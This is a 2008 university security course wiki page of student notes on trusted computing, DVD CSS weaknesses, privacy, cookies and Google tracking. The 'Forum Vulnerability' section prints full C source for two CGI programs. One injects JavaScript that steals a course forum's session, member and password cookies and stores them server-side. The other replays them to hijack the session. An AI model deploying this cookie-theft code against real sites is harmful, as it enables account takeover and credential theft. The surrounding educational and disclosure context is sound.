Remote Attestation - Allowing remote entities to gather information about your computing platform, thereby attesting its integrity. And also allowing for remote permissions management. All of these concepts work together to give yield the 5 desirable properties of security. Which I wont go into detail in, because we should all be familiar with them. Issues with Trusted Computing A major issue with Trusted Computing is the fact that it behaves like an unrecoverable root kit. Users are forced to work with the Trusted Computing platform, in a Big Brother-esque way. While Trusted Computing platforms attempt to provide robust security, it still isnt foolproof. Examples of this includes analogue attacks. Trusted computing is also a very draconian approach to DRM, and imposes strict policies which inconveniences users and may deny users legitimate use of their systems. The fact that Trusted Computing uses unique user and machine IDs to both store and send data means that almost all transactions are traceable to each user. This in itself is a HUGE privacy issue. PS3 as a Trusted Computing Platform Is not a true Trusted Computing platform. Does not have a TPM chip. Is not certified as a Trusted Computing Platform. Uses: A hypervisor to separate applications/operating system from direct access to hardware. 'Jails' applications (runs in separate memory spaces) Non Sony signed software only gets restricted access to hardware capabilities. AACS for video content protection Dis integrity checks for games. However, does embody many of TC's concepts: Endorsement Key Thus tying content to specific users on specific machines. Used to ban users from servers / restricted content. Secure Comms Allows for secure exchange of data. Eg: HDCP for transport of high definition content to output devices. Memory curtaining - Full isolation between user space memory and sensitive areas of memory. Prevents memory hooks and exploits. Remote Attestation - Checks authenticity of games online, checks for integrity of operating system. Drives for Breaking the PS3's Protection Unlock hardware capabilities. Piracy Why it remains secure Just like the Xbox360, PS3s online playing service allows for the banning of consoles. Of course, online game play is a major feature of both platforms. (Detection / Response measure) Newer games refuse to play on old (possibly) compromised versions of firmware. Sony uses games as a medium to force updates. (Response measure) Homebrew scene is almost not interested in breaking Sonys DRM. The Cells computational power alone is sufficient for homebrew games. (Preventative measure)

DVD CSS: Content Scramble System

All keys are 40 bits long. IE a key could look like this in hex: "AB CD EF 01 02". The key size is 40 bits to fit in with US Crypto Export restrictions. Your DVD Player (software or hardware) has at least one "Player Key". There are 409 player keys in total. Each DVD has a "Disk Key". The DVD stores its Disk Key in encrypted form, it stores 409 different hashes, one for each player key. So, a valid player key will be able to obtain a valid disk key. Each DVD has many titles, a title has a "Title Key". It is encrypted by the "Disk Key". Each title has many segments, a segment has a "Segment Key", however it is stored in plaintext and is used to augment the title key. Each title is made up of a data stream (mpeg-2 usually), the data stream is stored as cypher text encoded by (?TitleKey XOR Segment Key).

LFSR
Before we can talk about the CSS Algorithm, you need to know what an LFSR is; an LFSR is a "Linear Feedback Shift Register". It is used to generate a psuedu-random sequence of bits. Each LFSR has a fixed bit width, for example 16 bits, and a set of taps eg 0,14,15. An LFSR is set up with a starting "seed", which is just a number <= the bit width. After it has been seeded, we can then "clock" (or in the case of CSS, "chomp") the register to generate one pseudo-random bit. A worked example is the best way to show this. Consider this register which has been seeded with "4243". Eg:
================================================================= | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | => 4243 =================================================================

The register bits show the seed value. Lets "clock" it once. To clock it, we first read the value of the bits on the taps (0 on the right,14,15 on the left) and run them through a feedback function, in most cases it is XOR. Eg:
================================================================= | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | => 4243 ================================================================= | | | 0 0 1 Output = 0 xor 0 xor 1 => 1

The taps have values 1, 0 and 0, which when XORed together have the value 1. So, this is our random bit that we return! But wait, there's more! We also need to clock (modify) the register; so we left shift all the bits once, and feed the output onto the

right hand side; eg the new value of the register is:


================================================================= | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | => 34889 =================================================================

If we were to clock it again, we would get a 0 (1 xor 0 xor 1 == 0). We can continue to clock it as many times as we like. HOWEVER there are downsides! LFSRs are deterministic! And they are also cyclic. Eventually this register will reach the initial seed, and the random bits generated will follow the same pattern again. With a properly chosen set of taps, it will be able to generate (2^16 - 1) psuedu-random bits before cycling. Also note that given a starting seed of 0, it will remain at 0, so usually seed > 0 is enforced (or seed & 0x1000 is used). What is neat about LFSRs? Given an output from an LFSR, it is really hard to work out its starting seed! Infact, in most cases the only solution is to do a brute force across all possible starting seeds. (Think about it, in the example given, if we knew the first output bit, we have 4 possible values for the taps, and we have NO information about any other bits; we would need much more output to attempt to work out the start location) It is interesting to note that the LFSRs used in CSS differ from regular LFSRs in that usually the output bit is the one shifted off the end, instead in the CSS version it is the result of the feedback function. This change makes it much easier to deduce the starting state from a small number of output bytes.

The CSS Algorithm


Whenever we say "encoded", it means using the CSS Algorithm in one of its various modes. The modes do not differ enough to mention them here, they are just various settings for inverters infront of the LFSRs. See the sources for more info. CSS uses 2 LFSRs: 25 bit, initialised with the first 3 bytes of the Title Key. 17 bit, initialised with the last 2 bytes of the Title Key. Both LFSRs have 0x100 injected in to make an extra bit (and to ensure it is non-zero). Each LFSR is clocked 8 times to form an int output. Then the carry from the last round is added in (or 0 if there was no last round). This int output is then XOR'ed with the data stream to form the cypher text. A picture summarises it quite well (better than text does), these four show the LFSR config with taps:

There is also a "table based substitution" step, for the purpose of this, we're going to

ignore it, because it does not add anything to the complexity of the algorithm, it is purely there for confusion for any reverse-engineering efforts. Also note the inverters are for the modes, which will also not be discussed in this. Reverse Engineering This hack came about because an anonymous person found the player key for the Xine DVD player. The Player key was stored in memory, unencrypted. With details of the player key, the algorithm was reverse engineered and explored in depth.

Attacks on CSS
Brute Force 2^40 The key size is 40 bits. CSS was released in 1998. Brute forcing on one CPU, commodity hardware with highly optimised code, 2^40 keys take less than a month. Recall that there are a fixed number of player keys, 409 to be precise. Player keys cannot be changed because that would cause millions of hardware DVD players to stop working. So, on average doing a brute force, you would hit a valid player key every 2 hours. Remember that only one player key is needed... (It should also be noted that within a week of the first player key being exposed, all 409 keys were exposed). Known Plaintext 2^25 For simplicity, assume that we know the first 5 bytes of data in both plain and cypher text. This might come about, for example if CSS was used to encrypt a known filetype that has a known, standard header. With this information, we want to find out the title key that decrypts the rest of the data. Recall that the title key is stored split up as the initial seeds for the two LFSRs. So, if we could just work out the initial seeds for the LFSRs, we would have the key for the rest of the file. How does it work? We guess the starting state of LFSR17. Recall that there are 2^16 possible starting states. For each: We clock it out 3 bytes and we deduce what the value must be for LFSR25 at that stage by looking at the (cyphertext XOR plaintext) This will give us a known value for LFSR25 at the stage, but we will not know one of the values of the bits, so clock it backwards 4 and we try both states. Some of the states will be able to be culled since the 4th bit must be 1. For any states that look correct, we verify with our disk key hash. This is a little complex; let me try to rephrase it with less jargon: We brute force all possible values of LFSR17. Because we know the cypher+plaintext output we can deduce what the other LFSR must be outputting for up to 3 clocks ahead, so we clock our LFSR17 ahead 3. From here, we deduce what the value of LFSR25 must be, and search back to find what the seed must have been. Because we have 5 output bytes, we will be able to find all but the highest bit in LFSR25.

So we brute force both solutions Finally with each of our solutions, we attempt to verify them by running the output key against the (expensive) disk key hash. Complex? Yes. Do you need to know it? Not unless you want to rewrite libdvdcss. Other Attacks There is a known 2^16 attack to get the Disk Key using only the Disk Key hash. This is what most current day media players fall back to if their list of player keys fail. There is so much more to CSS than just what is presented here. Several interesting bits have been cut due to time constraints, for example the secret handshake between the DVD Drive and the CSS decrypter to transfer the keys. Make sure you check out the three sources listed at the top for a very indepth look into CSS.

Week12/NiceNotes
Security Funding
SECURITY IS EXPENSIVE - If you want it, you've got to pay for it. A HARD SELL - But you have to do it, or you will be ineffective as a security expert. What do you do? Need to show the costs of insufficient levels of security and work out an appropriate level from their Hollow logs - Budget on scary things, spend on sensible

SCARE the #$^& out of your boss


Fear seems to be the biggest motivating factor in getting money, so: Hack your own system to show it can be done (works well, provided they don't fire you on the spot) Hire penetration testers calculate the cost to the business of being attacked Once you have tricked your boss into giving you lots of money, don't spend it all at once. Keep some of it aside as a contingency plan. You will need it when an attack does take place.

Why should we Care About Privacy?


AOL Leaks - AOL researchers recently published the search logs of about 650,000 membersa total of 36,389,629 individual searches. "A list of 20 million search inquiries collected over a three-month period was published last month on a new Web site (research.aol.com) meant to endear AOL to academic researchers by providing several sets of data for study. AOL assigned each of the users a unique number, so the list shows what a person was interested in over many different searches." Internet users mirrored the search logs and constructed searchable data bases. From this, examples of a users search could be constructed like the following:

Some people were identified by the content of their searches.

PGP
Pretty Good Privacy "Email is unencrypted, terrible for anything you want to keep private!" Not True! Email can be sent using PGP and Tunnels! In order to use PGP you need to create a public and private key pair distributing your public key to the world and keeping your private key, well private. PGP allows you to sign messages (authenticate your identity and that fact that you authored the message). When you send a message to someone you encrypt the message's hash using your private key and send along in the message. The recipient decrypts the encrypted hash using your public key if the decrypted hash matches the actual message hash the message was probably send from you (this has the added side affect of ensuring message integrity). Encrypt messages (so that only the legitimate recipient can read it). Everyone who wants to send a encrypted message to you encrypts it with your public key. The message can only be decrypted by your private key. Is it secure? The algorithm is sound but there are always other options of breaking through PGP is still open to being broken by rubber hose cryptanalysis. The FBI has used keyloggers on the computer's of drug lords in order to steal their private key passphrase and then read all their encrypted messages. == TOR - The Onion Router== is a free software implementation of second-generation onion routing a system enabling its users to communicate anonymously on the Internet. "You cannot browse the internet absolutely anonymously and privately"

Stealing Your Data


What Tim Did Hosting an image on his server which was posted on the forum, when the server received requests it would log the html header data, parse the "who's logged in page" and work out who the data was about. What Adam Did Logged CSE ssh and logins.

3rd party tracking


CSS HACK
CSS determines what colour links will be. Javascript can ask what colour links are. So, we can render lots and lots of links, check what colour they are, remove all of the links and write down the visited links, all with javascript. That way the server can check your history and find out sites you frequent. This can be used for targeted phishing/social engineering attacks.

COOKIES
Cookies have a bad reputation, but they are not worms, viruses or spyware. They are just a small data file saved to a users hard drive by a website so that the website can remember the user when they come back. This is especially useful when different users are accessing the internet through the same ip, for example when going through a proxy or router. They serve as a unique identifier so that the website can identify the user and retrieve any relevant details about them from their database, such as your preferences on that website. This usage can be of convenience and benefit for both the user and the website. But cookies can also be used for surveillance. They can be used for tracking the web pages accessed by a user on a given site. This information can be used to create a profile of the user based on their browsing choices and actions.

Forum Vulnerability
We've emailed ss now, so we figure the vulnerability will be fixed soon and as such are free to release the source code for our exploit.
Toggle line numbers 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 /* * index.cgi * * * Created by Ping on 17/10/08. * */ #include <stdio.h> #include <stdlib.h> #include <string.h>

#define MAX_STRING 1000 void char void void void printOpening(char *title); *nextNameValue(char *str, char *name, char *value); stealCookie(); printCookie(char* session, char* member, char* pass); printRest();

int main(int argc, char **argv) { char *data = (char *) malloc(sizeof(char)*MAX_STRING); char *orig = data; data[0] = '\0'; fgets(data, MAX_STRING, stdin); if(data[0] == '\0') { int userId = 20; printOpening("Catch my cookies!"); printRest(); } else { printOpening("Cookie is Stolen!!"); strcat(data, "&"); printf("<body>\n");

36 37 printf("<h1>Thanks!</h1>\n"); 38 printf("<img src='http://www.cse.unsw.edu.au/~jamesh/cgi-bin/cookie2.jpg'></img>\n"); 39 40 printf("</body>\n"); 41 42 char *name = (char *) malloc(sizeof(char)*MAX_STRING); 43 char *value = (char *) malloc(sizeof(char)*MAX_STRING); 44 char session[100]; 45 char member[100]; 46 char password[100]; 47 name[0] = '\0'; 48 value[0] = '\0'; 49 50 while((data = nextNameValue(data, name, value)) != NULL) { 51 if(strcmp(name, "id") == 0) { 52 strncpy(session, value, 100); 53 } else if(strcmp(name, "ie") == 0){ 54 strncpy(member, value, 100); 55 } else if(strcmp(name, "if") == 0){ 56 strncpy(password, value, 100); 57 } 58 } 59 free(value); 60 free(name); 61 printCookie(session, member, password); 62 } 63 64 65 printf("</html>\n"); 66 free(orig); 67 68 return 0; 69 } 70 71 72 char *nextNameValue(char *str, char *name, char *value) { 73 char *ptr; 74 ptr = strsep(&str, "="); 75 if(ptr != NULL) { 76 strcpy(name, ptr); 77 } 78 79 ptr = strsep(&str, "&"); 80 if(ptr != NULL) { 81 strcpy(value, ptr); 82 } 83 return str; 84 } 85 86 /** 87 88 This function writes the java script to steal the forum cookies. The cookies are then placed into hidden fields

89 and submitted via post back to the CGI script. 90 91 **/ 92 void stealCookie() { 93 printf("<form action=\"index.cgi\" method=\"post\">\n"); 94 printf("<SCRIPT LANGUAGE=\"JavaScript\">\n"); 95 printf("var getName = GetCookie('08s2COMP3441iBSessionID');\n"); 96 printf("document.writeln(\"<input type='hidden' name='id' value='\"+ getName + \"' >\");"); 97 printf("var getMember = GetCookie('08s2COMP3441iBMemberID');\n"); 98 printf("document.writeln(\"<input type='hidden' name='ie' value='\"+ getMember + \"' >\");"); 99 printf("var getPass = GetCookie('08s2COMP3441iBPassWord');\n"); 100 printf("document.writeln(\"<input type='hidden' name='if' value='\"+ getPass + \"' >\");"); 101 printf("document.writeln(\"<button type='submit'>Click to give kitten more Cookies</button>\");"); 102 printf("</SCRIPT>\n"); 103 } 104 105 106 /** Print the Cookies to a file where the cgi is hosted **/ 107 void printCookie(char* session, char* member, char* pass) { 108 FILE* identifier = fopen("current", "w"); 109 fprintf(identifier, "%s", session); 110 fprintf(identifier, "\n"); 111 fprintf(identifier, "%s", member); 112 fprintf(identifier, "\n"); 113 fprintf(identifier, "%s", pass); 114 fprintf(identifier, "\n"); 115 fclose(identifier); 116 } 117 118 /** Print the first page, along with the javascript functions we need **/ 119 void printOpening(char *title) { 120 printf("Content-type: text/html\n\n"); 121 printf("<html>\n"); 122 printf("<head>\n"); 123 printf("<title>%s</title>\n", title); 124 printf("<link rel=\"stylesheet\" type=\"text/css\"href=\"style.css\" />\n"); 125 printf("<SCRIPT LANUAGE=\"JavaScript\">\n"); 126 printf("var today = new Date();\nvar expiry = new Date(today.getTime() + 365 * 24 * 60 * 60 * 1000);\n"); 127 printf("function getCookieVal (offset) {\n"); 128 printf("var endstr = document.cookie.indexOf (\";\", offset);\n"); 129 printf("var getName;\n"); 130 131 printf("if (endstr == -1) { endstr = document.cookie.length; }\n");

132 printf("return unescape(document.cookie.substring(offset, endstr));\n"); 133 printf("}\n\n"); 134 printf("function GetCookie (name) {\n"); 135 printf("var arg = name + \"=\";\n"); 136 printf("var alen = arg.length;\n"); 137 printf("var clen = document.cookie.length;\n"); 138 printf("var i = 0;\n"); 139 printf("while (i < clen) {\n"); 140 printf("var j = i + alen;\n"); 141 printf("if (document.cookie.substring(i, j) == arg) {\n"); 142 printf("return getCookieVal (j);\n"); 143 printf("}\n"); 144 printf("i = document.cookie.indexOf(\" \", i) + 1;\n"); 145 printf("if (i == 0) break;\n"); 146 printf(" }\n"); 147 printf("return null;\n"); 148 printf("}\n"); 149 150 printf("function SetCookie (name,value,expires,path,domain,secure) {\n"); 151 printf("document.cookie = name + \"=\" + escape (value) +\n"); 152 printf("((expires) ? \"; expires=\" + expires.toGMTString() : \"\") +\n"); 153 printf(" ((path) ? \"; path=\" + path : \"\") +\n"); 154 printf(" ((domain) ? \"; domain=\" + domain : \"\") +\n"); 155 printf(" ((secure) ? \"; secure\" : \"\");\n"); 156 printf(" }\n"); 157 printf("</SCRIPT>\n"); 158 printf("</head>\n"); 159 } 160 161 162 /** Print the cookie stealing html**/ 163 void printRest() { 164 printf("<body>\n"); 165 printf("<h1>Can Has Cookie?</h1>\n"); 166 printf("<img src='http://www.cse.unsw.edu.au/~jamesh/cgi-bin/cookie.jpg'></img>\n"); 167 stealCookie(); 168 printf("</body>\n"); 169 170 } 171

Toggle line numbers 1 /* 2 * index.cgi 3 * 4 * 5 * Created by Ping on 17/10/08. 6 * 7 */

8 #include <stdio.h> 9 #include <stdlib.h> 10 #include <string.h> 11 #include <time.h> 12 13 #define MAX_STRING 1000 14 15 void printOpening(); 16 void setIDCookie(char* userId, char* memberId, char* password); 17 18 int main(int argc, char **argv) { 19 20 FILE * sessionCookie = fopen("current", "r"); 21 char sessionID[100]; 22 char memberID[100]; 23 char passWord[100]; 24 fgets(sessionID, 100, sessionCookie); 25 sessionID[strlen(sessionID)-2] = '\0'; 26 fgets(memberID, 100, sessionCookie); 27 memberID[strlen(memberID)-1] = '\0'; 28 fgets(passWord, 100, sessionCookie); 29 passWord[strlen(passWord)-1] = '\0'; 30 printOpening(); 31 printf("<BODY>"); 32 setIDCookie(sessionID, memberID, passWord); 33 printf("</BODY>"); 34 printf("</HTML>"); 35 return 0; 36 } 37 38 void setIDCookie(char* userId, char* memberId, char* password){ 39 printf("<form action=\"index.cgi\" method=\"post\">\n"); 40 41 printf("<SCRIPT LANGUAGE=\"JavaScript\">\n"); 42 printf("SetCookie('08s2COMP3441iBSessionID', \"%s\", expiry, \"/\");\n",userId); 43 printf("SetCookie('08s2COMP3441iBMemberID', \"%s\", expiry, \"/\");\n", memberId); 44 printf("SetCookie('08s2COMP3441iBPassWord', \"%s\", expiry, \"/\");\n", password); 45 printf("</SCRIPT>\n"); 46 } 47 48 void printOpening() { 49 char* title = "Hello"; 50 printf("Content-type: text/html\n\n"); 51 printf("<html>\n"); 52 printf("<head>\n"); 53 printf("<title>%s</title>\n", title); 54 printf("<link rel=\"stylesheet\" type=\"text/css\"href=\"style.css\" />\n"); 55 printf("<SCRIPT LANUAGE=\"JavaScript\">\n"); 56 printf("var today = new Date();\nvar expiry = new Date(today.getTime() + 365 * 24 * 60 * 60 * 1000);\n"); 57 printf("function getCookieVal (offset) {\n");

58 printf("var endstr = document.cookie.indexOf (\";\", offset);\n"); 59 printf("var getName;\n"); 60 61 printf("if (endstr == -1) { endstr = document.cookie.length; }\n"); 62 printf("return unescape(document.cookie.substring(offset, endstr));\n"); 63 printf("}\n\n"); 64 printf("function GetCookie (name) {\n"); 65 printf("var arg = name + \"=\";\n"); 66 printf("var alen = arg.length;\n"); 67 printf("var clen = document.cookie.length;\n"); 68 printf("var i = 0;\n"); 69 printf("while (i < clen) {\n"); 70 printf("var j = i + alen;\n"); 71 printf("if (document.cookie.substring(i, j) == arg) {\n"); 72 printf("return getCookieVal (j);\n"); 73 printf("}\n"); 74 printf("i = document.cookie.indexOf(\" \", i) + 1;\n"); 75 printf("if (i == 0) break;\n"); 76 printf(" }\n"); 77 printf("return null;\n"); 78 printf("}\n"); 79 80 printf("function SetCookie (name,value,expires,path,domain,secure) {\n"); 81 printf("document.cookie = name + \"=\" + escape (value) +\n"); 82 printf("((expires) ? \"; expires=\" + expires.toGMTString() : \"\") +\n"); 83 printf(" ((path) ? \"; path=\" + path : \"\") +\n"); 84 printf(" ((domain) ? \"; domain=\" + domain : \"\") +\n"); 85 printf(" ((secure) ? \"; secure\" : \"\");\n"); 86 printf(" }\n"); 87 printf("</SCRIPT>\n"); 88 printf("</head>\n"); 89 }

EXTERNAL HOSTING
A third party cookie is one which does not originate from the domain of the website being visited. These can be transferred to a user's computer via an object contained within a webpage which is not actually located in the same domain as the webpage. These objects are mostly banners placed by advertising companies. Users can be tracked by an advertising company as they browse across any pages hosting an object for that company. By tracking a user's browsing, the advertising company can build up a profile of the user and potentially use this for targeted ads. Third party cookies can be detected and blocked to differing degrees by all the modern browsers. But they are enabled by default and the user must opt out.

FLASH COOKIES
We already know about browser cookies and how they can be used to track your movements and browsing habits by saving a user-id on your hard drive. People have

had privacy concerns about cookies for a long time and, largely due to these concerns, knowledge of their existence is widespread as well as the methods for disabling and deleting them. Marketers really hate this because it screws up their statistics and tracking strategies. People keep deleting their cookies (how rude)! But never fear, they have a work around. They do this by using Flash's "locally shared objects", aka flash cookies. Flash cookies are intended to be used just like browser cookies to store preferences and other info on users. However there are a few differences that set flash cookies apart from their tamer cousin the browser cookie. The first difference is the size of the file saved on your hard drive. Browser cookies are limited to only 4kb, whereas the default limit for flash cookies is set at 100kb. Secondly, you know those expiration dates on browser cookies? No such thing with Flash cookies. They in effect last forever (unless you manually delete them). Howeveer the most important distinction stems from their relative obscurity. People simply have not heard of flash cookies and flash cookies are not cleared when users delete their private data from within their browser. In addition to this, it is not even necessary to have a Flash movie, GUI, or anything visible to install and check for flash cookies. As long as the user has the Flash plugin, a flash cookie can be installed on a users' computer without them even being aware that there is a Flash script running. One especially sneaky method of using them is as a backup for browser cookies. When the website installs your browser cookie, it also installs a flash cookie. Now when the user deletes their browser cookies by clearing their private data from their browser, the flash cookie is left untouched. Now when the user revisits the website, if they don't have a browser cookie then the website can check for the Flash cookie and install a new browser cookie which links the user to their previous information. In effect the browser cookie that was deleted by the user can be reinstalled. Some people don't like this. If you are concerned there are several ways of preventing flash cookies: 1. Navigate to Macromedia's settings manager and set your privacy settings so that Flash Cookies (locally shared objects) are restricted or prevented from installing. or 2. Right click on any flash movie, go to settings and set your privacy settings To read the contents of flash cookies you need a locally shared object editor. There is a firefox extension that does this for you called Objection. This extension can also be used to delete the flash cookies. Alternatively you could delete them manually. They are saved by default in the following locations: 1. Linux: ~/.macromedia 2. OS X: ~/Library/Preferences/Macromedia/Flash Player 3. windows: Macromedia\Flash Player\#?SharedObjects

Google

Google knows everything you do online, and most of the things you do offline.

IP Tracking
Google maintains search logs linked to IP addresses to better target ads. Additionally, Yahoo! and US Google have a "feature" with which they log every keystroke into the search box. Scroogle.org - is one of the best ways to avoid google's tracking measures. When you send a request to scroogle they randomly select one of their servers, which randomly selects a Google IP. This server then sends your request to the chosen google IP, receives the search result and trashes all ads, cookies, etc and returns the modified search page to you. Scroogle offers an additional service which ssl encrypts the connection between you and them - this stops anyone between you and scroogle from sniffing your search terms or results. VPN/proxy - Explored in earlier seminar/lab. Results in google profiling your server, not you. TOR - As explained earlier, provides anonymity. Another search engine - Most track in similar ways, so pick the company you hate least and use their search. Awareness - Don't search for things you don't want linked back to you - Don't vainly search for yourself or things that could identify you.

Cookie Tracking
Google also track by a cookie which contains a unique identifier, the cookie is

encrypted and sent with search requests. Google servers then decrypt the ID and link it to their log. Yahoo(and sometimes Google) also return search results with urls which redirect via yahoo/google servers to track follow-through. Google claim that the cookie is required for personal settings, but this does not explain the unique identifiers. The set of all preferences is a finite set, so the cookie could contain some sort of numerical representation of your chosen settings(ie: 1254 might be English interface, French search, strict filtering, 20 results per page and do not launch results in new window) rather than an identifier which is linked server-side to your preferences (and who knows what else). In fact, this would result in less bandwidth (shorter cookies) and less work for google servers. Finally, preferences can be sent as arguments in the http get request (?hl=en), as such the unique ID cookie is completely unnecessary. To Avoid: Disable cookies from google, use the custom google search homepage demonstrated in the seminar. Use the browser plugin customize google. Again, use scroogle. DEMO of Cookie avoiding All google services are linked by a single user ID (gmail account). When signed into gmail all google searches are logged and linked to the account. This data can be viewed by the user and the local copy can be deleted - but there is no way for a gmail user to delete google's copy. In addition, other gmail services (such as google checkout) would track online purchases and link them to the user's account - "So, you just bought an iPod, maybe you want to buy some iPod accessories now?" better targetted ads. To Avoid: Don't use gmail or other google services. Only log in when you absolutely have to, don't have google 'remember me on this computer'. Google sometimes allows you to tighten privacy settings with certain services. Do this. Google toolbar sends some of your page requests to google servers before the browser even makes the DNS request. Google chrome's omnibox is a keylogger Every keystroke into the omnibox is sent to google servers much like the Yahoo search box. To Avoid: Pretty simple, don't use either of them.

Google don't make their privacy invasion overtly invasive. They violately your privacy by being convenient and awesome. They make you WANT to give them your private data. This is a great example of social engineering. To Avoid: - Vigilance! Be suspicious of everything. If someone is offering you a really cool service for free, be VERY suspicious.

Law
If you are worried about the amount of information company's hold on you, what can you do? Not Much. We made a request to Google under the Federal Privacy Act (which gives you the right to view information that an organisation hold about you); it turns out That you can only request information when your name is stored with it. If an organisation links information to an IP address (even if it's static) or an email address (as long as it's not firstName.lastName@somewhere.com ) then you cannot do anything. This means you do not have the right to view information Google ties to your IP address and cookie (all the search you have made, website you have visited, when you visited the said websites) If you have allowed Google to tie search history and web sites visited to your google account then you can view the information - just go to your Google account.
Hi Abigail Thanks for the follow up email. I can confirm that Google has reviewed its privacy obligations globally and the set of personal data provided on the Google Account page complies with Google's obligations under applicable laws.

Kind regards Garry Google Legal team

Why does it matter if a search engine stores your searches and pages visited? Well Google is not the only one that does it. AOL leaked a set of logs that were linked to user cookie ids. Just ask Jerry Cat and Thelma Arnold who are two of the people which were identified from their logs. You can have a look at what you can request on the Australian Privacy Commissioner's website at http://www.privacy.gov.au/privacy_rights/ComplaintChecker/index.html 1. Information from slides downloaded from: http://www.tml.tkk.fi/Studies/T-110.498/2003summer/Slides/lecture01.pdf (1)
TextBook (last edited 2008-11-12 15:58:46 by DijanaPopin)

You might also like